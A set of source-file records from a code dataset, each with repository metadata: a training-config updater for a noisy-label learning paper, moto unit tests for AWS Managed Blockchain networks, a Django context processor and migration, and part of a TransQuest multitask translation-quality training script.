2022-03-28T04:27:17.000Z
|
papers/ICCV2021-NGC/configs/_updater.py
|
huang-ziyuan/EssentialMC2
|
87141df94c1ac8e426ceec071720b97f5b9d3b88
|
[
"MIT"
] | 6
|
2021-11-01T09:28:13.000Z
|
2022-02-11T09:49:58.000Z
|
papers/ICCV2021-NGC/configs/_updater.py
|
huang-ziyuan/EssentialMC2
|
87141df94c1ac8e426ceec071720b97f5b9d3b88
|
[
"MIT"
] | 16
|
2021-11-11T06:26:18.000Z
|
2022-03-20T13:32:15.000Z
|
def update_data(hyper_params):
return dict(
train=dict(
samples_per_gpu=hyper_params['batch_size'],
workers_per_gpu=hyper_params['workers_per_gpu'],
dataset=dict(
root_dir=hyper_params['dataset_root'],
cifar_type=hyper_params['dataset_name'],
noise_mode=hyper_params['noise_mode'],
noise_ratio=hyper_params['noise_ratio']
)
),
test=dict(
samples_per_gpu=hyper_params['batch_size'] * 4,
workers_per_gpu=hyper_params['workers_per_gpu'],
dataset=dict(
root_dir=hyper_params['dataset_root'],
cifar_type=hyper_params['dataset_name']
)
),
eval=dict(
samples_per_gpu=hyper_params['batch_size'] * 4,
workers_per_gpu=hyper_params['workers_per_gpu'],
)
)
def update_openset_data(hyper_params):
return dict(
train=dict(
samples_per_gpu=hyper_params['batch_size'],
workers_per_gpu=hyper_params['workers_per_gpu'],
dataset=dict(
root_dir=hyper_params['dataset_root'],
cifar_type=hyper_params['dataset_name'],
noise_mode=hyper_params['noise_mode'],
noise_ratio=hyper_params['noise_ratio'],
ood_noise_name=hyper_params['ood_noise_name'],
ood_noise_root_dir=hyper_params['ood_noise_root_dir'],
ood_noise_num=hyper_params['ood_noise_num_train']
)
),
test=dict(
samples_per_gpu=hyper_params['batch_size'] * 4,
workers_per_gpu=hyper_params['workers_per_gpu'],
dataset=dict(
root_dir=hyper_params['dataset_root'],
cifar_type=hyper_params['dataset_name'],
ood_noise_name=hyper_params['ood_noise_name'],
ood_noise_root_dir=hyper_params['ood_noise_root_dir'],
ood_noise_num=hyper_params['ood_noise_num_test']
)
),
eval=dict(
samples_per_gpu=hyper_params['batch_size'] * 4,
workers_per_gpu=hyper_params['workers_per_gpu'],
)
)
def update_webvision_data(hyper_params):
return dict(
train=dict(
samples_per_gpu=hyper_params['batch_size'],
workers_per_gpu=hyper_params['workers_per_gpu'],
),
test=dict(
samples_per_gpu=hyper_params['batch_size'] * 4,
workers_per_gpu=hyper_params['workers_per_gpu'],
),
eval=dict(
samples_per_gpu=hyper_params['batch_size'] * 4,
workers_per_gpu=hyper_params['workers_per_gpu'],
),
imagenet=dict(
samples_per_gpu=hyper_params['batch_size'] * 4,
workers_per_gpu=8,
)
)
def update_model(hyper_params):
return dict(
head=dict(num_classes=hyper_params['num_classes'], out_feat_dim=hyper_params['feature_dim']),
num_classes=hyper_params['num_classes'],
alpha=hyper_params['alpha'],
data_parallel=hyper_params['data_parallel']
)
def update_solver(hyper_params):
return dict(
hyper_params=hyper_params,
optimizer=dict(lr=hyper_params['lr'], weight_decay=hyper_params.get('weight_decay') or 5e-4),
lr_scheduler=dict(T_max=hyper_params['max_epochs']),
max_epochs=hyper_params['max_epochs'],
)
| 35.561224
| 101
| 0.604017
| 410
| 3,485
| 4.65122
| 0.129268
| 0.305716
| 0.109596
| 0.169376
| 0.807027
| 0.807027
| 0.774515
| 0.774515
| 0.774515
| 0.774515
| 0
| 0.004045
| 0.290674
| 3,485
| 97
| 102
| 35.927835
| 0.767395
| 0
| 0
| 0.640449
| 0
| 0
| 0.160402
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05618
| false
| 0
| 0
| 0.05618
| 0.11236
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4e15790175ea46572e34e3be68fe64ed79c3ce16
| 4,312
|
py
|
Python
|
tests/test_managedblockchain/test_managedblockchain_networks.py
|
nourishcare/moto
|
8d3d43da90be101216d16330aeacaf7bd1fff6f4
|
[
"Apache-2.0"
] | null | null | null |
tests/test_managedblockchain/test_managedblockchain_networks.py
|
nourishcare/moto
|
8d3d43da90be101216d16330aeacaf7bd1fff6f4
|
[
"Apache-2.0"
] | null | null | null |
tests/test_managedblockchain/test_managedblockchain_networks.py
|
nourishcare/moto
|
8d3d43da90be101216d16330aeacaf7bd1fff6f4
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import unicode_literals
import boto3
import sure # noqa
from moto.managedblockchain.exceptions import BadRequestException
from moto import mock_managedblockchain
from . import helpers
@mock_managedblockchain
def test_create_network():
conn = boto3.client("managedblockchain", region_name="us-east-1")
response = conn.create_network(
Name="testnetwork1",
Framework="HYPERLEDGER_FABRIC",
FrameworkVersion="1.2",
FrameworkConfiguration=helpers.default_frameworkconfiguration,
VotingPolicy=helpers.default_votingpolicy,
MemberConfiguration=helpers.default_memberconfiguration,
)
network_id = response["NetworkId"]
member_id = response["MemberId"]
network_id.should.match("n-[A-Z0-9]{26}")
member_id.should.match("m-[A-Z0-9]{26}")
# Find in full list
response = conn.list_networks()
mbcnetworks = response["Networks"]
mbcnetworks.should.have.length_of(1)
mbcnetworks[0]["Name"].should.equal("testnetwork1")
# Get network details
response = conn.get_network(NetworkId=network_id)
response["Network"]["Name"].should.equal("testnetwork1")
@mock_managedblockchain
def test_create_network_withopts():
conn = boto3.client("managedblockchain", region_name="us-east-1")
response = conn.create_network(
Name="testnetwork1",
Description="Test Network 1",
Framework="HYPERLEDGER_FABRIC",
FrameworkVersion="1.2",
FrameworkConfiguration=helpers.default_frameworkconfiguration,
VotingPolicy=helpers.default_votingpolicy,
MemberConfiguration=helpers.default_memberconfiguration,
)
network_id = response["NetworkId"]
member_id = response["MemberId"]
network_id.should.match("n-[A-Z0-9]{26}")
member_id.should.match("m-[A-Z0-9]{26}")
# Find in full list
response = conn.list_networks()
mbcnetworks = response["Networks"]
mbcnetworks.should.have.length_of(1)
mbcnetworks[0]["Description"].should.equal("Test Network 1")
# Get network details
response = conn.get_network(NetworkId=network_id)
response["Network"]["Description"].should.equal("Test Network 1")
@mock_managedblockchain
def test_create_network_noframework():
conn = boto3.client("managedblockchain", region_name="us-east-1")
response = conn.create_network.when.called_with(
Name="testnetwork1",
Description="Test Network 1",
Framework="HYPERLEDGER_VINYL",
FrameworkVersion="1.2",
FrameworkConfiguration=helpers.default_frameworkconfiguration,
VotingPolicy=helpers.default_votingpolicy,
MemberConfiguration=helpers.default_memberconfiguration,
).should.throw(Exception, "Invalid request body")
@mock_managedblockchain
def test_create_network_badframeworkver():
conn = boto3.client("managedblockchain", region_name="us-east-1")
response = conn.create_network.when.called_with(
Name="testnetwork1",
Description="Test Network 1",
Framework="HYPERLEDGER_FABRIC",
FrameworkVersion="1.X",
FrameworkConfiguration=helpers.default_frameworkconfiguration,
VotingPolicy=helpers.default_votingpolicy,
MemberConfiguration=helpers.default_memberconfiguration,
).should.throw(
Exception, "Invalid version 1.X requested for framework HYPERLEDGER_FABRIC"
)
@mock_managedblockchain
def test_create_network_badedition():
conn = boto3.client("managedblockchain", region_name="us-east-1")
frameworkconfiguration = {"Fabric": {"Edition": "SUPER"}}
response = conn.create_network.when.called_with(
Name="testnetwork1",
Description="Test Network 1",
Framework="HYPERLEDGER_FABRIC",
FrameworkVersion="1.2",
FrameworkConfiguration=frameworkconfiguration,
VotingPolicy=helpers.default_votingpolicy,
MemberConfiguration=helpers.default_memberconfiguration,
).should.throw(Exception, "Invalid request body")
@mock_managedblockchain
def test_get_network_badnetwork():
conn = boto3.client("managedblockchain", region_name="us-east-1")
response = conn.get_network.when.called_with(
NetworkId="n-ABCDEFGHIJKLMNOP0123456789",
).should.throw(Exception, "Network n-ABCDEFGHIJKLMNOP0123456789 not found")
| 34.774194
| 83
| 0.726809
| 442
| 4,312
| 6.90724
| 0.192308
| 0.064199
| 0.047167
| 0.055028
| 0.835899
| 0.835899
| 0.75565
| 0.75565
| 0.75565
| 0.7396
| 0
| 0.021082
| 0.163961
| 4,312
| 123
| 84
| 35.056911
| 0.825798
| 0.018553
| 0
| 0.702128
| 0
| 0
| 0.182679
| 0.013251
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06383
| false
| 0
| 0.06383
| 0
| 0.12766
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9d6731737f2515afd78dfd4cf63cb4388f9b9e7a
| 119
|
py
|
Python
|
server/tomato/context_processors.py
|
dtcooper/tomato
|
a54aa3bc3858fa8ad377696f5275ac0c2103f33a
|
[
"MIT"
] | 1
|
2020-02-25T09:21:31.000Z
|
2020-02-25T09:21:31.000Z
|
server/tomato/context_processors.py
|
dtcooper/tomato
|
a54aa3bc3858fa8ad377696f5275ac0c2103f33a
|
[
"MIT"
] | null | null | null |
server/tomato/context_processors.py
|
dtcooper/tomato
|
a54aa3bc3858fa8ad377696f5275ac0c2103f33a
|
[
"MIT"
] | null | null | null |
from .client_server_constants import COLORS
def rotator_colors(request):
return {'ROTATOR_COLORS': dict(COLORS)}
| 19.833333
| 43
| 0.781513
| 15
| 119
| 5.933333
| 0.733333
| 0.292135
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12605
| 119
| 5
| 44
| 23.8
| 0.855769
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
9de738b1ea882829fbff5abe96cfb8d93e90bfc0
| 1,511
|
py
|
Python
|
django/trebek/apps/trivia/migrations/0013_auto_20210527_1431.py
|
whutch/trebek
|
8f5d80a97c7d3aaf29a2faf43a63969cb4150449
|
[
"MIT"
] | 1
|
2021-06-06T12:06:31.000Z
|
2021-06-06T12:06:31.000Z
|
django/trebek/apps/trivia/migrations/0013_auto_20210527_1431.py
|
whutch/trebek
|
8f5d80a97c7d3aaf29a2faf43a63969cb4150449
|
[
"MIT"
] | 1
|
2021-04-03T17:03:21.000Z
|
2021-05-27T21:14:59.000Z
|
django/trebek/apps/trivia/migrations/0013_auto_20210527_1431.py
|
whutch/trebek
|
8f5d80a97c7d3aaf29a2faf43a63969cb4150449
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.3 on 2021-05-27 19:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('trivia', '0012_auto_20201124_1702'),
]
operations = [
migrations.AlterField(
model_name='game',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='player',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='question',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='questioncategory',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='questionstate',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='userdata',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| 34.340909
| 111
| 0.605559
| 155
| 1,511
| 5.729032
| 0.283871
| 0.081081
| 0.168919
| 0.195946
| 0.737613
| 0.737613
| 0.737613
| 0.737613
| 0.737613
| 0.737613
| 0
| 0.028259
| 0.273991
| 1,511
| 43
| 112
| 35.139535
| 0.781222
| 0.029782
| 0
| 0.648649
| 1
| 0
| 0.07377
| 0.01571
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.027027
| 0
| 0.108108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d182eb75f003f809eb788df4e0ff6ea5348d128b
| 46,942
|
py
|
Python
|
transquest/training/run_multi.py
|
agesb/TransQuest
|
84fb49b2e8d3dfae6caacc378e9764e610452aad
|
[
"Apache-2.0"
] | null | null | null |
transquest/training/run_multi.py
|
agesb/TransQuest
|
84fb49b2e8d3dfae6caacc378e9764e610452aad
|
[
"Apache-2.0"
] | null | null | null |
transquest/training/run_multi.py
|
agesb/TransQuest
|
84fb49b2e8d3dfae6caacc378e9764e610452aad
|
[
"Apache-2.0"
] | null | null | null |
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import wandb
from transformers import AutoTokenizer, AutoModelForSequenceClassification
from transformers import XLMRobertaTokenizer, XLMRobertaForMaskedLM
import torch
from torch.utils.data import Dataset
import requests
import tqdm
import regex
import scipy
import sklearn
import tokenizers
import sentencepiece
from nlp import Dataset
from tqdm import tqdm
import sys
import os
import errno
import shutil
from sklearn.metrics import mean_absolute_error
from sklearn.model_selection import train_test_split
from pathlib import Path
# Set random seed and device
SEED = 1
torch.manual_seed(SEED)
torch.cuda.manual_seed(SEED)
torch.backends.cudnn.deterministic = True
GPU = True
if GPU:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
else:
device = torch.device("cpu")
print(f'Using {device}')
print(torch.cuda.get_device_name(0))
# Pandas Display settings
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_colwidth', None)
from CODE.transquest.training.util.prep_data import load_MLQE_data, load_WikiMatrix_data, swap_sentence_pairs, get_sentence_length
from CODE.transquest.training.util.draw import draw_scatterplot_multitransquest, print_stat
from CODE.transquest.training.util.normalizer import fit, un_fit
from CODE.transquest.algo.sentence_level.multitransquest.evaluation import pearson_corr, spearman_corr, rmse
from CODE.transquest.algo.sentence_level.multitransquest.run_model import MultiTransQuestModel
from CODE.transquest.algo.sentence_level.multitransquest.grad_reversal import WeightGradientsFunc, WeightGradients, test_weight_gradients
from CODE.transquest.training.multitransquest_config import TEMP_DIRECTORY, DRIVE_FILE_ID, MODEL_NAME, \
GOOGLE_DRIVE, multitransquest_config, MODEL_TYPE, SEED, RESULT_FILE, RESULT_IMAGE, SUBMISSION_FILE
from CODE.transquest.algo.sentence_level.multitransquest.utils import sweep_config_to_sweep_values
def train_MultiTransQuest(data, language, n_heads, wandb_group=None, **kwargs):
assert language in ['EN-DE', 'EN-ZH', 'ET-EN', 'RO-EN', 'SI-EN', 'NE-EN', 'RU-EN', 'MULTI']
if "task_config" in kwargs:
task_config = kwargs.get("task_config")
multitransquest_config.update(task_config)
print('I am working with', MODEL_TYPE, MODEL_NAME)
if not os.path.exists(TEMP_DIRECTORY):
os.makedirs(TEMP_DIRECTORY)
# Unpack the datasets
train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs = data
# Normalise the labels
for i in range(len(train_dataframes)):
train_dataframes[i] = fit(train_dataframes[i], 'labels')
dev_dataframes[i] = fit(dev_dataframes[i], 'labels')
if multitransquest_config["evaluate_during_training"]:
if multitransquest_config["n_fold"] > 1:
from collections import defaultdict
dev_predictions_dict = defaultdict(list)
test_predictions_dict = defaultdict(list)
##dev_preds = np.zeros((len(dev), multitransquest_config["n_fold"]))
# test_preds = np.zeros((len(test), multitransquest_config["n_fold"]))
dev_preds = []
test_preds = []
for i in range(multitransquest_config["n_fold"]):
if os.path.exists(multitransquest_config['output_dir']) and os.path.isdir(
multitransquest_config['output_dir']):
shutil.rmtree(multitransquest_config['output_dir'])
model = MultiTransQuestModel(MODEL_TYPE, MODEL_NAME, wandb_group=wandb_group,
use_cuda=torch.cuda.is_available(),
args=multitransquest_config, **kwargs)
train_dfs = []
eval_dfs = []
for df in train_dataframes:
train_df, eval_df = train_test_split(df, test_size=0.1, random_state=SEED * i)
train_dfs.append(train_df)
eval_dfs.append(eval_df)
model.train_model(train_dfs, eval_df=eval_dfs, multi_label=False)
model = MultiTransQuestModel(MODEL_TYPE, multitransquest_config["best_model_dir"],
wandb_group=wandb_group,
use_cuda=torch.cuda.is_available(), args=multitransquest_config, **kwargs)
for head in range(n_heads):
result, model_outputs, wrong_predictions = model.eval_model(dev_dataframes[head], curr_task=head,
multi_label=False)
predictions, raw_outputs = model.predict(list_test_sentence_pairs[head], curr_task=head)
if multitransquest_config['num_labels'][head] == 1:
dev_predictions_dict[head].append(model_outputs)
else:
dev_predictions_dict[head].append(model_outputs[:, 0])
test_predictions_dict[head].append([predictions])
list_test_results = []
list_dev_results = []
for head in range(n_heads):
test_dataframes[head]['predictions'] = np.array(test_predictions_dict[head]).squeeze().mean(axis=0)
dev_dataframes[head]['predictions'] = np.array(dev_predictions_dict[head]).squeeze().mean(axis=0)
df_dev_results = un_fit(dev_dataframes[head], 'labels')
df_dev_results = un_fit(dev_dataframes[head], 'predictions')
df_test_results = un_fit(test_dataframes[head], 'predictions')
df_dev_results.to_csv(os.path.join(TEMP_DIRECTORY, RESULT_FILE), header=True, sep='\t', index=False,
encoding='utf-8')
draw_scatterplot_multitransquest(df_dev_results, 'labels', 'predictions',
os.path.join(TEMP_DIRECTORY, RESULT_IMAGE), language, curr_task=head)
print_stat(df_dev_results, 'labels', 'predictions')
list_test_results.append(df_test_results)
list_dev_results.append(df_dev_results)
else:
model = MultiTransQuestModel(MODEL_TYPE, MODEL_NAME, wandb_group=wandb_group,
use_cuda=torch.cuda.is_available(),
args=multitransquest_config, **kwargs)
train_dfs = []
eval_dfs = []
for df in train_dataframes:
train_df, eval_df = train_test_split(df, test_size=0.1, random_state=SEED)
train_dfs.append(train_df)
eval_dfs.append(eval_df)
model.train_model(train_dfs, eval_df=eval_dfs, multi_label=False)
model = MultiTransQuestModel(MODEL_TYPE, multitransquest_config["best_model_dir"], wandb_group=wandb_group,
use_cuda=torch.cuda.is_available(), args=multitransquest_config, **kwargs)
list_test_results = []
list_dev_results = []
for head in range(n_heads):
result, model_outputs, wrong_predictions = model.eval_model(dev_dataframes[head], curr_task=head,
multi_label=False)
predictions, raw_outputs = model.predict(list_test_sentence_pairs[head], curr_task=head)
if multitransquest_config['num_labels'][head] == 1:
dev_dataframes[head]['predictions'] = model_outputs
else:
dev_dataframes[head]['predictions'] = model_outputs[:, 0]
test_dataframes[head]['predictions'] = predictions
dev_head = un_fit(dev_dataframes[head], 'labels')
dev_head = un_fit(dev_dataframes[head], 'predictions')
test_head = un_fit(test_dataframes[head], 'predictions')
dev_head.to_csv(os.path.join(TEMP_DIRECTORY, RESULT_FILE), header=True, sep='\t', index=False,
encoding='utf-8')
draw_scatterplot_multitransquest(dev_head, 'labels', 'predictions',
os.path.join(TEMP_DIRECTORY, RESULT_IMAGE), language, curr_task=head)
print_stat(dev_head, 'labels', 'predictions')
list_test_results.append(test_head)
list_dev_results.append(dev_head)
else:
model = MultiTransQuestModel(MODEL_TYPE, MODEL_NAME, wandb_group=wandb_group,
use_cuda=torch.cuda.is_available(),
args=multitransquest_config, **kwargs)
model.train_model(train_dataframes, multi_label=False)
# Get evaluation and prediction per task
list_test_results = []
list_dev_results = []
for head in range(n_heads):
result, model_outputs, wrong_predictions = model.eval_model(dev_dataframes[head], curr_task=head,
multi_label=False)
predictions, raw_outputs = model.predict(list_test_sentence_pairs[head], curr_task=head)
if multitransquest_config['num_labels'][head] == 1:
dev_dataframes[head]['predictions'] = model_outputs
else:
dev_dataframes[head]['predictions'] = model_outputs[:, 0]
test_dataframes[head]['predictions'] = predictions
dev_head = un_fit(dev_dataframes[head], 'labels')
dev_head = un_fit(dev_dataframes[head], 'predictions')
test_head = un_fit(test_dataframes[head], 'predictions')
dev_head.to_csv(os.path.join(TEMP_DIRECTORY, RESULT_FILE), header=True, sep='\t', index=False,
encoding='utf-8')
draw_scatterplot_multitransquest(dev_head, 'labels', 'predictions',
os.path.join(TEMP_DIRECTORY, RESULT_IMAGE), language, curr_task=head)
print_stat(dev_head, 'labels', 'predictions')
list_test_results.append(test_head)
list_dev_results.append(dev_head)
return list_test_results, list_dev_results
def multitask_mixed_labels(language = 'EN-DE', labels = ['DA', 'HTER'], wandb_group=None, is_sweeping=False, **kwargs):
if is_sweeping:
with wandb.init(group=wandb_group) as run:
sweep_config = wandb.config
print('CONFIG', wandb.config)
language = sweep_config['language']
labels = sweep_config['labels']
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
for label in labels:
# Load train, dev and test data with the corresponding label
train, dev, test = load_MLQE_data(language=language, label=label, prep_for_training=True)
# Create test sentence pairs in the expected format
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language, wandb_group,
n_heads=len(train_dataframes))
else:
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
for label in labels:
# Load train, dev and test data with the corresponding label
train, dev, test = load_MLQE_data(language=language, label=label, prep_for_training=True)
# Create test sentence pairs in the expected format
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language, n_heads=len(train_dataframes), **kwargs)
return test_preds_per_task, dev_preds_per_task
def multitask_mixed_languages(languages=["EN-DE", "RO-EN"], label= "DA", wandb_group="mixed_languages_multitask", is_sweeping=False, **kwargs):
if is_sweeping:
#wandb_group = SWEEP_CONFIG['parameters']['wandb_group']['values'][0]
with wandb.init(group=wandb_group) as run:
sweep_config = wandb.config
print('CONFIG', wandb.config)
languages = sweep_config['languages']
label = sweep_config['label']
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
for language in languages:
train, dev, test = load_MLQE_data(language=language, label=label,
prep_for_training=True)
# Create test sentence pairs in the expected format
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language, wandb_group,
n_heads=len(train_dataframes))
else:
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
for language in languages:
train, dev, test = load_MLQE_data(language=language, label=label,
prep_for_training=True)
# Create test sentence pairs in the expected format
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language, n_heads=len(train_dataframes), **kwargs)
return test_preds_per_task, dev_preds_per_task
def multitask_augmented_wiki_data(language="EN-DE", wandb_group="aug_data_multitask", label='DA', is_sweeping=False, **kwargs):
if is_sweeping:
print(wandb_group)
with wandb.init(group=wandb_group) as run:
sweep_config = wandb.config
print('CONFIG', wandb.config)
language = sweep_config['language']
print(language)
label = sweep_config['label']
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
data = ['MLQE', 'WikiMatrix_Binary_Classification']
for dataset in data:
if dataset == 'MLQE':
train, dev, test = load_MLQE_data(language=language, label=label, prep_for_training=True)
elif dataset == 'WikiMatrix_Binary_Classification':
if language == 'EN-DE':
file = 'ende_9000_aug_custom_pipeline.tsv'
if language == 'EN-ZH':
file = 'wiki_enzh_9000.tsv'
train, dev, test = load_WikiMatrix_data(language=language, label=label,\
file=file, prep_for_training=True)
else:
print('Please specify which method should be used to load this dataset')
# Create test sentence pairs in the expected format
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language,
n_heads=len(train_dataframes))
else:
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
data = ['MLQE', 'WikiMatrix_Binary_Classification']
for dataset in data:
if dataset == 'MLQE':
train, dev, test = load_MLQE_data(language=language, label=label, prep_for_training=True)
elif dataset == 'WikiMatrix_Binary_Classification':
if language == 'EN-DE':
file = 'ende_9000_aug_custom_pipeline.tsv'
if language == 'EN-ZH':
file = 'wiki_enzh_9000.tsv'
train, dev, test = load_WikiMatrix_data(language=language, label=label, \
file=file, prep_for_training=True)
else:
print('Please specify which method should be used to load this dataset')
# Create test sentence pairs in the expected format
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language,
n_heads=len(train_dataframes), **kwargs)
return test_preds_per_task, dev_preds_per_task
def multitask_shuffled_MLQE_data(language="EN-DE", wandb_group="shu_MLQE_data_multitask", is_sweeping=False, **kwargs):
if is_sweeping:
with wandb.init(group=wandb_group) as run:
sweep_config = wandb.config
print('CONFIG', wandb.config)
language = sweep_config['language']
print(language)
label = sweep_config['label']
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
data = ['MLQE', 'MLQE_shuffle']
for dataset in data:
train, dev, test = load_MLQE_data(language=language, label='DA', prep_for_training=True)
if dataset == 'MLQE_shuffle':
train["shuffled_text_a"] = train["text_a"].sample(frac=1, random_state=1).values
df_train_good = train[['text_a', 'text_b']].copy()
df_train_good['labels'] = np.ones(len(train)).astype(int)
df_train_good = df_train_good[:3500]
df_train_bad = train[['shuffled_text_a', 'text_b']].copy()
df_train_bad['labels'] = np.zeros(len(train)).astype(int)
df_train_bad = df_train_bad.rename(columns={"shuffled_text_a": "text_a"})
df_train_bad = df_train_bad[3500:]
train = pd.concat((df_train_good, df_train_bad), ignore_index=True)
train = train.sample(frac=1, random_state=1)
dev["shuffled_text_a"] = dev["text_a"].sample(frac=1, random_state=1).values
df_dev_good = dev[['text_a', 'text_b']].copy()
df_dev_good['labels'] = np.ones(len(dev)).astype(int)
df_dev_good = df_dev_good[:500]
df_dev_bad = dev[['shuffled_text_a', 'text_b']].copy()
df_dev_bad = df_dev_bad.rename(columns={"shuffled_text_a": "text_a"})
df_dev_bad['labels'] = np.zeros(len(dev)).astype(int)
df_dev_bad = df_dev_bad[500:]
dev = pd.concat((df_dev_good, df_dev_bad), ignore_index=True)
dev = dev.sample(frac=1, random_state=1)
test["shuffled_text_a"] = test["text_a"].sample(frac=1, random_state=1).values
df_test_good = test[['text_a', 'text_b']].copy()
df_test_good['labels'] = np.ones(len(test)).astype(int)
df_test_good = df_test_good[:500]
df_test_bad = test[['shuffled_text_a', 'text_b']].copy()
df_test_bad = df_test_bad.rename(columns={"shuffled_text_a": "text_a"})
df_test_bad['labels'] = np.zeros(len(test)).astype(int)
df_test_bad = df_test_bad[500:]
test = pd.concat((df_test_good, df_test_bad), ignore_index=True)
test = test.sample(frac=1, random_state=1)
test['index'] = np.arange(0, len(test))
# Create test sentence pairs in the expected format
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language, wandb_group,
n_heads=len(train_dataframes))
else:
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
data = ['MLQE', 'MLQE_shuffle']
for dataset in data:
train, dev, test = load_MLQE_data(language=language, label='DA', prep_for_training=True)
if dataset == 'MLQE_shuffle':
train["shuffled_text_a"] = train["text_a"].sample(frac=1, random_state=1).values
df_train_good = train[['text_a', 'text_b']].copy()
df_train_good['labels'] = np.ones(len(train)).astype(int)
df_train_good = df_train_good[:3500]
df_train_bad = train[['shuffled_text_a', 'text_b']].copy()
df_train_bad['labels'] = np.zeros(len(train)).astype(int)
